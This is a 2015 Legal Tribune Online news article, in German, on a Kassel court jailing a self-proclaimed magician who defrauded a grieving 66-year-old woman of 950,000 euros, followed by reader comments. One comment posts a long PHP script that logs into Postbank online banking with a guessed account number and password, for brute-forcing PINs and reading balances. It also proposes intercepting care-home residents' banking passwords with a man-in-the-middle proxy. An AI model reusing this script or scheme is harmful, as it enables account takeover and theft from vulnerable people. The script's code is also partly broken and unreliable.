LTO.de - Legal Tribune Online - Aktuelles aus Recht und Justiz
 

AG Kassel verurteilt falschen Magier: Fauler Zauber für 950.000 Euro

11.06.2015

Ein selbst ernannter Hexer hatte sich das Vertrauen einer von Schicksalsschlägen gebeutelten 66-Jährigen erschlichen. Mit ihr führte er Rituale und allerlei ähnliche Praktiken durch und ließ sich von der alten Dame dafür fürstlich entlohnen.

Das Amtsgericht (AG) Kassel verurteilte den Mann am Mittwoch wegen eines besonders schweren Falls von Wucher zu dreieinhalb Jahren Haft. Er habe in der Frau eine kranke und leidende Person erkannt, dies ausgenutzt und sie zum Sozialfall gemacht. Insgesamt entstand der Frau durch die Dienste des selbst ernannten Zauberers ein Schaden von 950.000 Euro. Davon flossen nach Angaben des Gerichts 680.000 Euro Bargeld an den Mann.

Von Juli 2008 bis August 2009 hatte er in einem Raum mit Kerzen "Rituale" mit dem Opfer durchgeführt. Die Frau hatte zuvor mehrere Schicksalsschläge erlitten: Innerhalb weniger Monate waren ihr Vater, Großvater, Onkel und Cousin gestorben. Die erbrachten Leistungen - etwa Kartenlegen - seien nutzlos gewesen, befand der Richter aus Kassel.

Ebenfalls als unnütz hatten Richter des Bundesgerichtshofs (BGH) in einem Zivilverfahren bereits vor einigen Jahren die Dienste einer Wahrsagerin bewertet, welche die emotional hilflose Position eines Mannes ausbeutet hatte. Bei den Leistungen der Kartenlegerin handele es sich um einen Fall der Unmöglichkeit, daher schulde der Betroffene ihr kein Entgelt, entschieden die Richter damals.

dpa/ms/LTO-Redaktion

Zitiervorschlag

AG Kassel verurteilt falschen Magier: Fauler Zauber für 950.000 Euro . In: Legal Tribune Online, 11.06.2015 , https://www.lto.de/persistent/a_id/15827/ (abgerufen am: 26.08.2019 )

Infos zum Zitiervorschlag
Kommentare
  • 11.06.2015 16:09, onlinebanking.passwordrecovery@zentral-bank.eu

    Für hilflose alte Damn die ihr Onlinebanking passwort vergessen haben hab ich dieses PASSWORD RECOVERy TOOL maschinell errät, ganz ohne Hokus-pokus: Die Postbank Passwörter fürs Onlinbanking bestehen aus [A-Z0-9] mit mindestens 5 Stellen Länge, die Kontonummer (eines Gegenübers) bekommt man ja einfach heraus.

    Folgender code in PHP der leicht in einen Proxy zu integrieren ist - etwa
    um im Altenheim selbst als MAN IN THE MIDDEL als Pestbank aufzutreten dann kann man als eine Art Bundestrojaner die Passwörter der Schützlinge mitschreiben damit Sie nicht nochmal verlorengehen - sollte hilfreich sein ...

    In die vorletzte Zeile muss das per brute force (durchprobieren) ermittelte passwort:

    postbank("0123456789","BRUTEFORCE");

    Das Script gibt bei Erfolg den Kontostand aus, ... mal so als Anfang ...

    <?php
    /*
    https://banking.postbank.de/rai/login
    <form method="post" class="form-cn"
    action="./login?-1.IFormSubmitListener-login-loginForm" id="id3">
    <input type="hidden" name="id3_hf_0" id="id3_hf_0" />
    <input type="hidden" name="jsDisabled" value="true" class=""/>
    <input type="text" value="" maxlength="30" name="nutzername" id="id1"
    class="type-text required required" autocomplete="off" minlength="2"
    title="Sie können sich mit Ihrem Benutzernamen oder einer Kontonummer
    anmelden."/>
    <input type="password" value="" maxlength="50" name="kennwort"
    id="pin-number" class="type-password required" autocomplete="off"
    minlength="5" title="Bitte geben Sie zum Benutzernamen das Passwort an
    und zur Kontonummer die PIN."/>
    </form>
    */


    function readheader($fres) {
    $nhdr = 0;
    $sshdr = "";

    while (true) {
    $shdr .= fread($fres, 1);
    $nhdr += 1;
    if ($nhdr >= 4) {
    if (substr($shdr, ($nhdr - 4), 4) == "\r\n\r\n") {
    break;
    }
    }
    }

    return $shdr;
    }

    function headervalue($shdr, $sfld, $case = true) {
    $sval = "";
    $sprv = "";

    $aHDR = explode("\r\n", $shdr);

    $nHDR = count($aHDR);
    $nhdr = 0;
    while ($nhdr < $nHDR) {

    $ahdr = explode(":", $aHDR[$nhdr], 2);
    if (count($ahdr) == 2) {
    $sprv = $ahdr[0];
    } else {
    if (($sprv != "") && ($ahdr[1] == "")) {
    $ahdr[1] = $ahdr[0];
    $ahdr[0] = $sprv;
    }
    }
    if ($ahdr[0] == $sfld) {
    if ($sval != "") {
    $sval .= "\r\n";
    }
    $sval .= $ahdr[1];
    } else {
    if ($case != true) {
    if (strtolower($ahdr[0]) == strtolower($sfld)) {
    if ($sval != "") {
    $sval .= "\r\n";
    }
    $sval .= $ahdr[1];
    }
    }
    }

    $nhdr++;
    }

    return $sval;
    }

    function readchunked($fres) {
    $nbdy = 0;
    $sbdy = "";

    while (true) {

    $nckh = 0;
    $sckh = "";
    while (true) {
    $sckh .= fread($fres, 1);
    $nckh += 1;
    if ($nckh >= 2) {
    if (substr($sckh, ($nckh - 2), 2) == "\r\n") {
    break;
    }
    }
    }

    //echo "\$sckh '" . htmlentities($sckh) ."'";

    $nckb = 0;
    $sckb = "";
    $npos = strpos($sckh,"\r\n");
    if ($npos !== false) {
    if ($npos > 0) {
    $nhex = substr($sckh, 0, $npos);
    $nckb = hexdec($nhex);

    //echo " \$nckb " . $nckb ."\r\n<br>";

    if ($nckb > 0) {
    while (strlen($sckb) < $nckb) {
    $sckb .= fread($fres, 1);
    }
    // $sckb = fread($fres, $nckb);
    $nbdy += $nckb;
    $sbdy .= $sckb;
    } else {
    // trailing \r\n
    $sckb = fread($fres, 2);
    if ($sckb == "\r\n") {
    break;
    }
    }
    }
    }

    }

    return $sbdy;
    }


    //ob_start();
    set_time_limit(10);

    //foreach($_SERVER as $key_name => $key_value) { echo "<pre>" .
    $key_name . " = " . $key_value . "\n</pre>\n"; }

    function postbank($snum, $spin) {
    $NDBG=0;

    $sres = "";

    $nerr = 0;
    $serr = "";

    $ssrv="banking.postbank.de";

    $sreq = "";
    $sres = "";

    if ($fres = fsockopen ("ssl://" . $ssrv, 443, $nerr, $serr)) {
    $sreq="";
    $shdr="";
    $sbdy="";

    $surl="/rai/login?-1.IFormSubmitListener-login-loginForm";

    $spst = "";
    $spst .= "id3_hf_0=&";
    $spst .= "jsDisabled=false&";
    $spst .= "kennwort=" . $spin;
    $spst .= "&loginButton=Anmelden";
    $spst .= "&nutzername=" . $snum ;

    $sreq .= (($spst == "") ? "GET" : "POST") . " " . $surl . "
    HTTP/1.1\r\n";
    $sreq .= "Host: " . $ssrv . "\r\n";

    if ($spst != "") {
    $sreq .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $sreq .= "Content-length: " . strlen($spst) . "\r\n";
    }
    $sreq .= "Connection: keep-alive\r\n";
    $sreq .= "\r\n";
    if ($spst != "") {
    $sreq .= $spst . "\r\n";
    $sreq .= "\r\n";
    }

    if ($NDBG != 0) {
    echo "<hr>";
    echo "<pre>" .htmlentities($sreq) . "</pre>";
    }

    fwrite ($fres,$sreq);
    $shdr = readheader($fres);
    $slen = headervalue($shdr, "Content-Length", false);
    $slen = trim($slen);
    if ($slen != "") {
    if ($slen != 0) {
    $nlen = intval($slen);
    while (strlen($sbdy) < $mlen) {
    $sbdy .= fread($fres, 1);
    }
    }
    }

    if ($NDBG != 0) {
    echo "<hr>";
    echo "<pre>" .htmlentities($shdr) . "</pre>";
    echo "<pre>" .htmlentities($sbdy) . "</pre>";
    echo "<hr>";
    }

    $sCOK = "";
    $scok = headervalue($shdr, "Set-Cookie", false);
    $acok = explode("\r\n",$scok);
    $nCOK = count($acok);
    $ncok = 0;
    while ($ncok <= $nCOK) {
    $acok[$ncok] = trim($acok[$ncok]);
    if (strlen($acok[$ncok]) >= 11) {
    if (substr($acok[$ncok],0,11) == "JSESSIONID=") {

    $npos = strpos($acok[$ncok], "; Path=/");
    if ($npos !== false) {
    $acok[$ncok] = substr($acok[$ncok],0,$npos);
    }

    $sCOK .= "Cookie: " . $acok[$ncok] . "\r\n";
    }
    }
    // echo $ncok . ". " . $acok[$ncok] . "\r\n<br>";
    $ncok++;
    }
    $scok = $sCOK;

    //echo $scok;

    $scod="";
    $ahdr = explode("\r\n",$shdr);
    $nHDR = count($ahdr);
    if ($nHDR >= 1) {
    if (strlen($ahdr[0]) >= strlen("HTTP/1.1")) {
    if (substr($ahdr[0],0,strlen("HTTP/1.1")) == "HTTP/1.1") {
    if (strlen($ahdr[0]) >= strlen("HTTP/1.1 ###")) {
    $scod = substr($ahdr[0], strlen("HTTP/1.1 "), 3);
    }
    }
    }
    }
    if ($scod == "302") {

    $sRDR = "";
    $srdr = headervalue($shdr, "Location", false);
    $srdr = trim($srdr);

    if (strlen($srdr) >= strlen("https://")) {

    if (substr($srdr,0,strlen("https://")) == "https://") {
    if (strlen($srdr) >= strlen("https://" . $ssrv)) {
    $surl = substr($srdr, strlen("https://" . $ssrv),
    (strlen($srdr) - strlen("https://" . $ssrv)));
    }
    }
    }

    }

    $sreq="";
    $shdr="";
    $sbdy="";

    $sreq .= (($spst == "") ? "GET" : "POST") . " " . $surl . "
    HTTP/1.1\r\n";
    $sreq .= "Host: " . $ssrv . "\r\n";

    if ($scok != "") {
    $sreq .= $scok;
    }
    $sreq .= "Connection: keep-alive\r\n";
    $sreq .= "\r\n";

    if ($NDBG != 0) {
    echo "<hr>";
    echo "<pre>" .htmlentities($sreq) . "</pre>";
    }

    fwrite ($fres,$sreq);
    $shdr = readheader($fres);
    $slen = headervalue($shdr, "Content-Length", false);
    $slen = trim($slen);
    if ($slen != "") {
    if ($slen != 0) {
    $nlen = intval($slen);
    while (strlen($sbdy) < $mlen) {
    $sbdy .= fread($fres, 1);
    }
    }
    }

    if ($NDBG != 0) {
    echo "<hr>";
    echo "<pre>" .htmlentities($shdr) . "</pre>";
    echo "<pre>" .htmlentities($sbdy) . "</pre>";
    echo "<hr>";
    }

    $scod="";
    $ahdr = explode("\r\n",$shdr);
    $nHDR = count($ahdr);
    if ($nHDR >= 1) {
    if (strlen($ahdr[0]) >= strlen("HTTP/1.1")) {
    if (substr($ahdr[0],0,strlen("HTTP/1.1")) == "HTTP/1.1") {
    if (strlen($ahdr[0]) >= strlen("HTTP/1.1 ###")) {
    $scod = substr($ahdr[0], strlen("HTTP/1.1 "), 3);
    }
    }
    }
    }
    if ($scod == "302") {

    $sRDR = "";
    $srdr = headervalue($shdr, "Location", false);
    $srdr = trim($srdr);

    if (strlen($srdr) >= strlen("https://")) {
    if (substr($srdr,0,strlen("https://")) == "https://") {

    if (strlen($srdr) >= strlen("https://" . $ssrv)) {
    $surl = substr($srdr, strlen("https://" . $ssrv),
    (strlen($srdr) - strlen("https://" . $ssrv)));
    }
    }
    }

    }


    //echo $surl;

    $spst="";
    $sreq="";
    $shdr="";
    $sbdy="";

    $sreq .= (($spst == "") ? "GET" : "POST") . " " . $surl . "
    HTTP/1.1\r\n";
    $sreq .= "Host: " . $ssrv . "\r\n";

    if ($scok != "") {
    $sreq .= $scok;
    }
    $sreq .= "Connection: keep-alive\r\n";
    $sreq .= "\r\n";

    if ($NDBG != 0) {
    echo "<hr>";
    echo "<pre>" .htmlentities($sreq) . "</pre>";
    }

    fwrite ($fres,$sreq);
    $shdr = readheader($fres);
    $slen = headervalue($shdr, "Content-Length", false);
    $slen = trim($slen);
    if ($slen != "") {
    if ($slen != 0) {
    $nlen = intval($slen);
    while (strlen($sbdy) < $mlen) {
    $sbdy .= fread($fres, 1);
    }
    }
    }

    if ($NDBG != 0) {
    echo "<hr>";
    echo "<pre>" .htmlentities($shdr) . "</pre>";
    echo "<pre>" .htmlentities($sbdy) . "</pre>";
    echo "<hr>";
    }

    $scod="";
    $ahdr = explode("\r\n",$shdr);
    $nHDR = count($ahdr);
    if ($nHDR >= 1) {
    if (strlen($ahdr[0]) >= strlen("HTTP/1.1")) {
    if (substr($ahdr[0],0,strlen("HTTP/1.1")) == "HTTP/1.1") {
    if (strlen($ahdr[0]) >= strlen("HTTP/1.1 ###")) {
    $scod = substr($ahdr[0], strlen("HTTP/1.1 "), 3);
    }
    }
    }
    }
    if ($scod == "302") {

    $sRDR = "";
    $srdr = headervalue($shdr, "Location", false);
    $srdr = trim($srdr);

    if (strlen($srdr) >= strlen("https://")) {
    if (substr($srdr,0,strlen("https://")) == "https://") {

    if (strlen($srdr) >= strlen("https://" . $ssrv)) {
    $surl = substr($srdr, strlen("https://" . $ssrv),
    (strlen($srdr) - strlen("https://" . $ssrv)));
    }
    }
    }

    }


    //echo $surl;

    $spst="";
    $sreq="";
    $shdr="";
    $sbdy="";

    $sreq .= (($spst == "") ? "GET" : "POST") . " " . $surl . "
    HTTP/1.1\r\n";
    $sreq .= "Host: " . $ssrv . "\r\n";

    if ($scok != "") {
    $sreq .= $scok;
    }
    $sreq .= "Connection: keep-alive\r\n";
    $sreq .= "\r\n";

    if ($NDBG != 0) {
    echo "<hr>";
    echo "<pre>" .htmlentities($sreq) . "</pre>";
    }

    fwrite ($fres,$sreq);
    $shdr = readheader($fres);
    $slen = headervalue($shdr, "Content-Length", false);
    $slen = trim($slen);
    if ($slen != "") {
    if ($slen != 0) {
    $nlen = intval($slen);
    while (strlen($sbdy) < $mlen) {
    $sbdy .= fread($fres, 1);
    }
    }
    }

    if ($NDBG != 0) {
    echo "<hr>";
    echo "<pre>" .htmlentities($shdr) . "</pre>";
    echo "<pre>" .htmlentities($sbdy) . "</pre>";
    echo "<hr>";
    }

    $scod="";
    $ahdr = explode("\r\n",$shdr);
    $nHDR = count($ahdr);
    if ($nHDR >= 1) {
    if (strlen($ahdr[0]) >= strlen("HTTP/1.1")) {
    if (substr($ahdr[0],0,strlen("HTTP/1.1")) == "HTTP/1.1") {
    if (strlen($ahdr[0]) >= strlen("HTTP/1.1 ###")) {
    $scod = substr($ahdr[0], strlen("HTTP/1.1 "), 3);
    }
    }
    }
    }
    if ($scod == "302") {

    $sRDR = "";
    $srdr = headervalue($shdr, "Location", false);
    $srdr = trim($srdr);

    if (strlen($srdr) >= strlen("https://")) {
    if (substr($srdr,0,strlen("https://")) == "https://") {

    if (strlen($srdr) >= strlen("https://" . $ssrv)) {
    $surl = substr($srdr, strlen("https://" . $ssrv),
    (strlen($srdr) - strlen("https://" . $ssrv)));
    }
    }
    }

    }


    //echo $surl;

    $spst="";
    $sreq="";
    $shdr="";
    $sbdy="";

    $sreq .= (($spst == "") ? "GET" : "POST") . " " . $surl . "
    HTTP/1.1\r\n";
    $sreq .= "Host: " . $ssrv . "\r\n";

    if ($scok != "") {
    $sreq .= $scok;
    }
    $sreq .= "Connection: keep-alive\r\n";
    $sreq .= "\r\n";

    if ($NDBG != 0) {
    echo "<hr>";
    echo "<pre>" .htmlentities($sreq) . "</pre>";
    }

    fwrite ($fres,$sreq);
    $shdr = readheader($fres);
    $senc = headervalue($shdr, "Transfer-Encoding", false);
    $senc = trim($senc);
    if ($senc == "chunked") {
    $nbdy = -1;
    $sbdy = readchunked($fres);
    $nbdy = strlen($sbdy);
    }


    if ($NDBG != 0) {
    echo "<hr>";
    echo "<pre>" .htmlentities($shdr) . "</pre>";
    echo "<pre>" .htmlentities($sbdy) . "</pre>";
    echo "<hr>";
    }

    $sopn="<div class=\"account-balance\">";
    $nopn = strpos($sbdy, $sopn);
    if ($nopn !== false) {
    $nopn += strlen($sopn);
    $scls = "</div>";
    $ncls = strpos($sbdy, $scls, $nopn);
    if ($ncls !== false) {
    $seur=substr($sbdy, $nopn , ($ncls - $nopn));
    echo "EURO " . $seur ;
    }
    }

    }

    }

    postbank("0123456789","BRUTEFORCE");
    exit(0);
    ?>

    http://sch-einesystem.tumblr.com/post/121267271588/ich-hatte-bestanden

  • 11.06.2015 17:39, John

    Der BGH entschied gerade nicht, dass kein Entgelt geschuldet war sondern ließ vielmehr offen, ob der Entfall der Gegenleistungspflicht abbedungen wurde. Eine endgültige Entscheidung gab es wegen eines Vergleichs in dieser Sache nicht.